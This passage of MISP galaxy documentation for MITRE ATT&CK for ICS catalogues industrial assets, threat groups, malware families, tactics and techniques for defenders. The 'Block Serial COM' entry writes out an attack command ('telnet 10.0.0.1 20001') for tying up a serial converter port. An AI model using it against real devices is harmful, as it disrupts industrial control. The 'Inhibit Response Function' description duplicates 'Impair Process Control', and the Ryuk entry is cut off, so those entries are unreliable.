using computer monitors and audio subsystems, and the control sequences (such as keystrokes with the computer keyboard, movements of the computer mouse, and selections with the touchscreen) the user employs to control the program. Currently the following types of HMI are the most common: Graphical user interfaces (GUI) accept input via devices such as computer keyboard and mouse and provide articulated graphical output on the computer monitor. Web-based user interfaces accept input and provide output by generating web pages which are transported via the network and viewed by the user using a web browser program. The operations user must be able to control the system and assess the state of the system. Each control system vendor provides a unique look-and-feel to their basic HMI applications. An older, not gender-neutral version of the term is man-machine interface (MMI). The system may expose several user interfaces to serve different kinds of users. User interface screens may be optimized to provide the appropriate information and control interface to operations users, engineering users and management users.

The tag is: misp-galaxy:mitre-ics-assets="Human-Machine Interface"

**Input/Output Server**

The Input/Output (I/O) server provides the interface between the control system LAN applications and the field equipment monitored and controlled by the control system applications. The I/O server, sometimes referred to as a Front-End Processor (FEP) or Data Acquisition Server (DAS), converts the control system application data into packets that are transmitted over various types of communications media to the end device locations. The I/O server also converts data received from the various end devices over different communications mediums into data formatted to communicate with the control system networked applications.

The tag is: misp-galaxy:mitre-ics-assets="Input/Output Server"

**Safety Instrumented System/Protection Relay**

A safety instrumented system (SIS) takes automated action to keep a plant in a safe state, or to put it into a safe state, when abnormal conditions are present. The SIS may implement a single function or multiple functions to protect against various process hazards in your plant. The function of protective relaying is to cause the prompt removal from service of an element of a power system when it suffers a short circuit or when it starts to operate in any abnormal manner that might cause damage or otherwise interfere with the effective operation of the rest of the system.

The tag is: misp-galaxy:mitre-ics-assets="Safety Instrumented System/Protection Relay"

**Groups**

Groups are sets of related intrusion activity that are tracked by a common name in the security community. Groups are also sometimes referred to as campaigns or intrusion sets. Some groups have multiple names associated with the same set of activities due to various organizations tracking the same set of activities by different names. Groups are mapped to publicly reported technique use and referenced in the ATT&CK for ICS knowledge base. Groups are also mapped to reported software used during intrusions.
ALLANITE

ALLANITE is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to Dragonfly / Dragonfly 2.0, although ALLANITE's technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence.

The tag is: misp-galaxy:mitre-ics-groups="ALLANITE"

Table 4148. Table References

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<tr>
<td><a href="https://dragos.com/resource/allanite/">https://dragos.com/resource/allanite/</a></td>
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<tr>
<td><a href="https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk">https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk</a></td>
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</table>

APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.

The tag is: misp-galaxy:mitre-ics-groups="APT33"

Table 4149. Table References

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<td><a href="https://attack.mitre.org/groups/G0064/">https://attack.mitre.org/groups/G0064/</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage">https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</a></td>
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<td><a href="https://dragos.com/resource/magnallium/">https://dragos.com/resource/magnallium/</a></td>
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<td><a href="https://www.wired.com/story/iran-hackers-us-phishing-tensions/">https://www.wired.com/story/iran-hackers-us-phishing-tensions/</a></td>
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</table>
**Dragonfly**

Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0. There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: `misp-galaxy:mitre-ics-groups="Dragonfly"`

*Table 4150. Table References*

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<td><a href="https://attack.mitre.org/groups/G0035/">https://attack.mitre.org/groups/G0035/</a></td>
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<td><a href="https://dragos.com/resource/dymalloy/">https://dragos.com/resource/dymalloy/</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-293A">https://www.us-cert.gov/ncas/alerts/TA17-293A</a></td>
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</table>

**Dragonfly 2.0**

Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0's initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: `misp-galaxy:mitre-ics-groups="Dragonfly 2.0"`

*Table 4151. Table References*

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<td><a href="https://dragos.com/resource/dymalloy/">https://dragos.com/resource/dymalloy/</a></td>
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</table>
HEXANE

HEXANE is a threat group that has targeted ICS organization within the oil & gas, and telecommunications sectors. Many of the targeted organizations have been located in the Middle East including Kuwait. HEXANE's targeting of telecommunications has been speculated to be part of an effort to establish man-in-the-middle capabilities throughout the region. HEXANE’s TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.

The tag is: misp-galaxy:mitre-ics-groups="HEXANE"

Table 4152. Table References

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<tr>
<td><a href="https://dragos.com/resource/hexane/">https://dragos.com/resource/hexane/</a></td>
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<td><a href="https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms">https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms</a></td>
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</table>

Lazarus group

Lazarus group is a suspected North Korean adversary group that has targeted networks associated with civilian electric energy in Europe, East Asia, and North America. Links have been established associating this group with the WannaCry ransomware from 2017.3 While WannaCry was not an ICS focused attack, Lazarus group is considered to be a threat to ICS. North Korean group definitions are known to have significant overlap, and the name Lazarus Group is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. Some organizations track North Korean clusters or groups such as Bluenoroff, APT37, and APT38 separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: misp-galaxy:mitre-ics-groups="Lazarus group"

Table 4153. Table References

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<tr>
<td><a href="https://dragos.com/resource/covellite/">https://dragos.com/resource/covellite/</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-132A">https://www.us-cert.gov/ncas/alerts/TA17-132A</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-164A">https://www.us-cert.gov/ncas/alerts/TA17-164A</a></td>
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Leafminer

Leafminer is a threat group that has targeted Saudi Arabia, Japan, Europe and the United States. Within the US, Leafminer has targeted electric utilities and initial access into those organizations. Reporting indicates that Leafminer has not demonstrated ICS specific or destructive capabilities.

The tag is: `misp-galaxy:mitre-ics-groups="Leafminer"`

Table 4154. Table References

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<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east">https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east</a></td>
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<tr>
<td><a href="https://dragos.com/resource/raspite/">https://dragos.com/resource/raspite/</a></td>
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OilRig

OilRig is a suspected Iranian threat group that has targeted the financial, government, energy, chemical, and telecommunication sectors as well as petrochemical, oil & gas. OilRig has been observed operating in Iraq, Pakistan, Israel, and the UK, and has been linked to the Shamoon attacks in 2012 on Saudi Aramco.

The tag is: `misp-galaxy:mitre-ics-groups="OilRig"`

Table 4155. Table References

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<tr>
<td><a href="https://www.fireeye.com/current-threats/apt-groups.html#apt34">https://www.fireeye.com/current-threats/apt-groups.html#apt34</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html">https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></td>
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Sandworm

Sandworm is a threat group associated with the Kiev, Ukraine electrical transmission substation attacks which resulted in the impact of electric grid operations on December 17th, 2016. Sandworm
has been cited as the authors of the Industroyer malware which was used in the 2016 Ukraine attacks.

The tag is: `misp-galaxy:mitre-ics-groups="Sandworm"`

### Table 4156. Table References

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<td><a href="https://dragos.com/resource/electrum/">https://dragos.com/resource/electrum/</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html">https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html</a></td>
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<td><a href="https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B">https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B">https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B</a></td>
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### XENOTIME

XENOTIME is a threat group that has targeted and compromised industrial systems, specifically safety instrumented systems that are designed to provide safety and protective functions. Xenotime has previously targeted oil & gas, as well as electric sectors within the Middle east, Europe, and North America. Xenotime has also been reported to target ICS vendors, manufacturers, and organizations in the middle east. This group is one of the few with reported destructive capabilities.

The tag is: `misp-galaxy:mitre-ics-groups="XENOTIME"`

### Table 4157. Table References

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<td><a href="https://dragos.com/resource/xenotime/">https://dragos.com/resource/xenotime/</a></td>
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### Levels

Based on the Purdue Model to aid ATT&CK for ICS users to understand which techniques are applicable to their environment.
Levels is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
MITRE

Level 0

The I/O network level includes the actual physical processes and sensors and actuators that are directly connected to process equipment.

The tag is: misp-galaxy:mitre-ics-levels="Level 0"

Level 1

The control network level includes the functions involved in sensing and manipulating physical processes. Typical devices at this level are programmable logic controllers (PLCs), distributed control systems, safety instrumented systems and remote terminal units (RTUs).

The tag is: misp-galaxy:mitre-ics-levels="Level 1"

Level 2

The supervisory control LAN level includes the functions involved in monitoring and controlling physical processes and the general deployment of systems such as human-machine interfaces (HMIs), engineering workstations and historians.

The tag is: misp-galaxy:mitre-ics-levels="Level 2"

Software

Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK for ICS.

ACAD/Medre.A

ACAD/Medre.A is a worm that steals operational information. The worm collects AutoCAD files with drawings. ACAD/Medre.A has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="ACAD/Medre.A"
**Backdoor.Oldrea, Havex**

Backdoor.Oldrea is a Remote Access Trojan (RAT) that communicates with a Command and Control (C2) server. The C2 server can deploy payloads that provide additional functionality. One payload has been identified and analyzed that enumerates all connected network resources, such as computers or shared resources, and uses the classic DCOM-based (Distributed Component Object Model) version of the Open Platform Communications (OPC) standard to gather information about connected control system devices and resources within the network.

The tag is: `misp-galaxy:mitre-ics-software="Backdoor.Oldrea, Havex"`

---

**Bad Rabbit, Diskcoder.D**

Bad Rabbit is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine.

The tag is: `misp-galaxy:mitre-ics-software="Bad Rabbit, Diskcoder.D"`
**BlackEnergy 3**

BlackEnergy 3 is a malware toolkit that has been used by both criminal and APT actors. It supports various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid.

The tag is: `misp-galaxy:mitre-ics-software="BlackEnergy 3"`

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**Conficker**

Conficker is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant.

The tag is: `misp-galaxy:mitre-ics-software="Conficker"`

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**Duqu**

Duqu is a collection of computer malware discovered in 2011. It is reportedly related to the Stuxnet worm, although Duqu is not self-replicating.

The tag is: `misp-galaxy:mitre-ics-software="Duqu"`

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**Flame**

Flame is an attacker-instructed worm which may open a backdoor and steal information from a compromised computer. Flame has the capability to be used for industrial espionage.

The tag is: `misp-galaxy:mitre-ics-software="Flame"`
**Industroyer**

Industroyer is a sophisticated piece of malware designed to cause an Impact to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations. Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.

The tag is: `misp-galaxy:mitre-ics-software="Industroyer"`

**KillDisk**

In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable.

The tag is: `misp-galaxy:mitre-ics-software="KillDisk"`

**LockerGoga**

LockerGoga is ransomware that has been tied to various attacks on industrial and manufacturing firms with apparently catastrophic consequences.

The tag is: `misp-galaxy:mitre-ics-software="LockerGoga"`
NotPetya

NotPetya is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though NotPetya presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.

The tag is: *misp-galaxy:mitre-ics-software="NotPetya"*

PLC-Blaster

PLC-Blaster is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules.

The tag is: *misp-galaxy:mitre-ics-software="PLC-Blaster"*

Ryuk

Ryuk is ransomware that was first seen targeting large organizations for high-value ransoms in

The tag is: *misp-galaxy:mitre-ics-software=*"Ryuk"

*Table 4170. Table References*

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**Stuxnet**

Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.

The tag is: *misp-galaxy:mitre-ics-software=*"Stuxnet"

*Table 4171. Table References*

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<td><a href="https://scadahacker.com/resources/stuxnet-mitigation.html">https://scadahacker.com/resources/stuxnet-mitigation.html</a></td>
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**Triton**

Triton is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers

The tag is: *misp-galaxy:mitre-ics-software=*"Triton"

*Table 4172. Table References*

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**VPNFilter**

VPNFilter is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols

The tag is: *misp-galaxy:mitre-ics-software=*"VPNFilter"

**Table 4173. Table References**

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**WannaCry**

WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploit EternalBlue.

The tag is: *misp-galaxy:mitre-ics-software=*"WannaCry"

**Table 4174. Table References**

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<td><a href="https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/">https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/</a></td>
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Tactics

A list of all 11 tactics in ATT&CK for ICS.

Tactics is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

MITRE

Collection

The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal. Collection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of Discovery, to compile data on control systems and targets of interest that may be used to follow through on the adversary's objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other refs may also be at risk and exposed on the internet or otherwise publicly accessible.

The tag is: misp-galaxy:mitre-ics-tactics="Collection"

Table 4175. Table References

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Command and Control

The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment. Command and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use
commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Command and Control"

### Discovery

The adversary is trying to figure out your ICS environment. Discovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:mitre-ics-tactics="Discovery"

### Evasion

The adversary is trying to avoid being detected. Evasion consists of techniques that adversaries use to avoid detection by both human operators and technical defenses throughout their compromise. Techniques used for evasion include removal of indicators of compromise, spoofing communications and reporting, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense and operator evasion for this purpose are often more passive in nature, as opposed to Inhibit Response Function techniques. They may also vary depending on whether the target of evasion is human or technological in nature, such as security controls. Techniques under other tactics are cross-listed to evasion when those techniques include the added benefit of subverting operators and defenses.
Execution

The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network Discovery and Collection, impact operations, and inhibit response functions.

Table 4179. Table References

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Impact

The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment. Impact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage Impair Process Control techniques, which often manifest in more self-revealing impacts on operations, or Inhibit Response Function techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach. Loss of Productivity and Revenue, Theft of Operational Information, and Damage to Property are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.

The tag is: misp-galaxy:mitre-ics-tactics="Impact"

Table 4180. Table References

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Impair Process Control

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: `misp-galaxy:mitre-ics-tactics="Impair Process Control"`

Table 4181. Table References

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Inhibit Response Function

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: `misp-galaxy:mitre-ics-tactics="Inhibit Response Function"`

Table 4182. Table References

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Initial Access

The adversary is trying to get into your ICS environment. Initial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.

The tag is: `misp-galaxy:mitre-ics-tactics="Initial Access"`

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### Techniques

A list of Techniques in ATT&CK for ICS.

Techniques is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
Activate Firmware Update Mode

Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.

The tag is: misp-galaxy:mitre-ics-techniques="Activate Firmware Update Mode"

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Alarm Suppression

Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole. In the Maroochy Attack, the adversary suppressed alarm reporting to the central computer. A Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. The method of suppression may greatly depend on the type of alarm in question: An alarm raised by a protocol message. An alarm signaled with I/O. An alarm bit set in a flag and read. In ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.

The tag is: misp-galaxy:mitre-ics-techniques="Alarm Suppression"

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Automated Collection

Adversaries may automate collection of industrial environment information using tools or scripts.
This automated collection may leverage native control protocols and tools available in the control systems environment. For example, the OPC protocol may be used to enumerate and gather information. Access to a system or interface with these native protocols may allow collection and enumeration of other attached, communicating servers and devices.

The tag is: `misp-galaxy:mitre-ics-techniques="Automated Collection"`

**Block Command Message**

Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. In the 2015 attack on the Ukrainian power grid, malicious firmware was used to render communication devices inoperable and effectively prevent them from receiving remote command messages.

The tag is: `misp-galaxy:mitre-ics-techniques="Block Command Message"`

**Block Reporting Message**

Adversaries may block or prevent a reporting message from reaching its intended target. Reporting messages relay the status of control system devices, which can include event log data and I/O values of the associated device. By blocking these reporting messages, an adversary can potentially hide their actions from an operator. Blocking reporting messages in control systems that manage physical processes may contribute to system impact, causing inhibition of a response function. A control system may not be able to respond in a proper or timely manner to an event, such as a dangerous fault, if its corresponding reporting message is blocked. In the 2015 attack on the Ukrainian power grid, malicious firmware was used to render communication devices inoperable and effectively block messages from being reported.

The tag is: `misp-galaxy:mitre-ics-techniques="Block Reporting Message"`
**Block Serial COM**

Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. A serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available — 1, 2 and 3 —, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.

The tag is: *misp-galaxy:mitre-ics-techniques="Block Serial COM"*

**Table 4189. Table References**

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**Brute Force I/O**

Adversaries may brute force I/O addresses on a device and attempt to exhaustively perform an action. By enumerating the full range of I/O addresses, an adversary may manipulate a process function without having to target specific I/O interfaces. More than one process function manipulation and enumeration pass may occur on the targeted I/O range in a brute force attempt.

The tag is: *misp-galaxy:mitre-ics-techniques="Brute Force I/O"*

**Table 4190. Table References**

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Change Program State

Adversaries may attempt to change the state of the current program on a control device. Program state changes may be used to allow for another program to take over control or be loaded onto the device.

The tag is: misp-galaxy:mitre-ics-techniques="Change Program State"

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Command-Line Interface

Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation. CLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.

The tag is: misp-galaxy:mitre-ics-techniques="Command-Line Interface"

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Commonly Used Port

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples as follows TCP:80 (HTTP), TCP:443 (HTTPS), TCP/UDP:53 (DNS), TCP:1024-4999 (OPC on XP/Win2k3), TCP:49152-65535 (OPC on Vista and later), TCP:23 (TELNET), UDP:161 (SNMP), TCP:502 (MODBUS), TCP:102 (S7comm/ISO-TSAP), TCP:20000 (DNP3), TCP:44818 (Ethernet/IP)
Connection Proxy

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. The definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other. The network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

Damage to Property

Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in Loss of Safety. Operations that result in Loss of Control may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of Loss of Productivity and Revenue. The German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. In the Maroochy Attack, Vitek Boden gained remote computer access to the control system and altered data so that whatever function should have occurred at affected
pumping stations did not occur or occurred in a different way. This ultimately led to 800,000 liters of raw sewage being spilled out into the community. The raw sewage affected local parks, rivers, and even a local hotel. This resulted in harm to marine life and produced a sickening stench from the community’s now blackened rivers. A Polish student used a remote controller device to interface with the Lodz city tram system in Poland. Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside.

The tag is: misp-galaxy:mitre-ics-techniques="Damage to Property"

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Data Destruction

Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident. Standard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.

The tag is: misp-galaxy:mitre-ics-techniques="Data Destruction"

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Data Historian Compromise

Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. Dragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution.1 The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include refs to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be expected to have extensive connections within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks.

The tag is: misp-galaxy:mitre-ics-techniques="Data Historian Compromise"

Data from Information Repositories

Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of target information repositories include reference databases and local machines on the process environment.

The tag is: misp-galaxy:mitre-ics-techniques="Data from Information Repositories"
Default Credentials

Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. Default credentials are normally documented in an instruction manual that is either packaged with the device, published online through official means, or published online through unofficial means. Adversaries may leverage default credentials that have not been properly modified or disabled.

The tag is: *misp-galaxy:mitre-ics-techniques*="Default Credentials"

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Denial of Control

